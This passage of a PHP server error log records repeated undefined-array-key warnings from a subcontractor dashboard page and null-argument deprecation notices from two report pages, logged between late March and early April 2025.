/home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:26:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [27-Mar-2025 03:26:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [27-Mar-2025 04:42:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 05:11:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 05:44:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Mar-2025 02:06:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Mar-2025 03:58:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Mar-2025 01:23:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [31-Mar-2025 02:11:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [31-Mar-2025 12:40:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [01-Apr-2025 02:27:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Apr-2025 20:22:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Apr-2025 23:34:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [03-Apr-2025 23:23:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 00:14:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 00:54:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 08:53:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 09:07:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 14:04:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 14:05:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 14:05:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 05:47:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 12:24:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 22:48:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 22:50:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 22:50:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 02:19:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 06:25:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 07:03:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 11:37:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:45:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:47:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:47:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:49:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 22:25:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 23:25:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:11:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:12:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 00:12:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 00:12:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [07-Apr-2025 00:12:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [07-Apr-2025 00:13:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:17:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:29:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 00:37:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 00:37:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 00:37:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 00:38:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:46:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:12:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:31:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:31:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:38:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:44:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:44:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 01:44:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 01:44:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:47:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:49:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:03:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:03:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:10:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:10:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:10:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:19:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:21:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:21:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:21:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:21:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:21:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:46:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:46:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:46:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:46:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:47:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:55:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:58:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:59:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:10:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:30:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:30:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 03:30:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 03:33:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:33:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:35:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:35:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 03:35:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 03:36:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:36:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:38:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:38:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:41:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:44:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:44:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 03:44:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 03:47:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:48:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:56:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:03:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:04:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:05:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:05:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:05:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:11:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:14:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:16:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:16:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:33:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:34:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:34:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:34:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:35:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:36:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:37:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:37:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:38:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:40:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:43:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:44:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:49:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:50:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:50:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:50:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:53:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:57:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:57:20 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:57:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:57:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:57:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:58:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:01:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:02:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:02:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:08:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:08:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:09:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:09:38 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:09:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:09:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:10:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:11:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:12:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:16:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:16:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:16:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:18:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:26:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:26:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:26:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:27:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:28:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:29:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:29:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:32:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:33:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:33:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:33:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:35:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:35:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:38:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:38:02 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:41:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:42:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:43:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:43:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:48:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 05:48:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 05:49:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:56:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 05:56:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 